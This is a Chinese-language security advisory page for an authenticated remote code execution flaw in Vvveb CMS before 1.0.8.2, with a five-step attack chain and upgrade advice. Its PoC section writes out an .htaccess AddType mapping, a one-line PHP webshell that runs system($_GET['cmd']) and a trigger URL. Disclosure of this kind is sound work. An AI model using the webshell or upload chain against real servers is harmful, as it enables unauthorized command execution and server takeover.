CVE-2026-41934 CVSS 8.8 高危

CVE-2026-41934 Vvveb CMS认证后远程代码执行漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41934

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Vvveb CMS

漏洞概述

Vvveb CMS 1.0.8.2 之前版本存在经过身份验证的远程代码执行漏洞。低权限用户可利用管理员代码编辑器中的文件扩展名限制不足，通过上传恶意 .htaccess 文件和 PHP 代码，实现远程代码执行。

技术细节

该漏洞核心在于 Vvveb CMS 的管理员代码编辑器未正确限制文件类型。攻击者需具备低权限账户（如编辑者），利用编辑器上传一个恶意的 .htaccess 文件，通过 Apache 指令（如 AddType）将任意自定义后缀（如 .xyz）映射为 PHP 处理器。随后，攻击者上传带有该自定义后缀的 PHP Webshell。由于 .htaccess 的配置，Web 服务器会将该文件解析为 PHP 执行，从而使得攻击者无需高权限即可在服务器上执行任意系统命令。

攻击链分析

STEP 1

1. 获取低权限凭证

攻击者获取一个具有 editor、author、contributor 或 site_admin 角色的低权限账户。

STEP 2

2. 访问代码编辑器

登录后台，访问管理员代码编辑器功能。

STEP 3

3. 上传恶意配置文件

利用编辑器写入或修改 .htaccess 文件，添加指令将任意扩展名（如 .pwn）映射到 PHP 处理程序。

STEP 4

4. 上传 Webshell

上传包含恶意 PHP 代码的文件，使用步骤 3 中定义的自定义扩展名（如 shell.pwn）。

STEP 5

5. 执行代码

通过浏览器访问上传的文件 URL，服务器将其解析为 PHP 并执行，从而获得服务器控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-41934 PoC Concept
# 1. Upload .htaccess to map .pwn to PHP handler
# Content of .htaccess:
# AddType application/x-httpd-php .pwn

# 2. Upload Webshell with .pwn extension
# Filename: shell.pwn
# Content:
# <?php system($_GET['cmd']); ?>

# 3. Trigger execution
# Access: http://target.com/shell.pwn?cmd=whoami

影响范围

Vvveb < 1.0.8.2

防御指南

临时缓解措施

建议立即升级到修复版本。若暂时无法升级，应禁用非管理员用户的代码编辑权限，并检查服务器上是否存在异常的 .htaccess 文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表